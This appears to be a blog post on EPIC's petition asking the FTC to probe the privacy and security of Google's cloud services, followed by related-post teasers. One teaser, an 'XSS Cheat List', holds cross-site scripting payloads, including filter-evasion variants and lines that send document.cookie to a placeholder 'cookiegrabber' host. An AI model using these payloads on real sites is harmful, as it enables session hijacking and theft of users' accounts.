Electronic Privacy Information Center (EPIC) a privacy group based in Washington, D.C filed a petition to Federal trade commission to investigate the Google’s cloud computing offerings. They asked FTC to investigate products including Gmail, Google Docs, Google Calendar and Picasa — to determine “the adequacy of the privacy and security safeguards.”

The group cites various security breaches involving Google products including the one happened few weeks back which shared Google hosted documents to other users without permission. It also cites security breaches in Gmail and Google desktop dating back to 2005. The complaint also cites marketing tactics used by Google which offers complete security of customer’s data and TOS which doesn’t guarantee any.

Previous EPIC complaints have led the Commission to order Microsoft to revise the security standards for Passport and to require Choicepoint to change its business practices and pay $15 m in fines.

Find the complaint here

http://epic.org/privacy/cloudcomputing/google/ftc031709.pdf

Explore More

Finding 0days in Web Applications

Most zero-day exploits in web applications are usually easier to find, study, and attack than actual services like a webserver due to the fact that a hacker does not need

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav&#x09;ascript:alert('XSS');\"> <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

Google Talk Cheats

With Google Talk being all the craze right now, some people hating it, and others loving it, I figured that I would post a list of tips and tricks for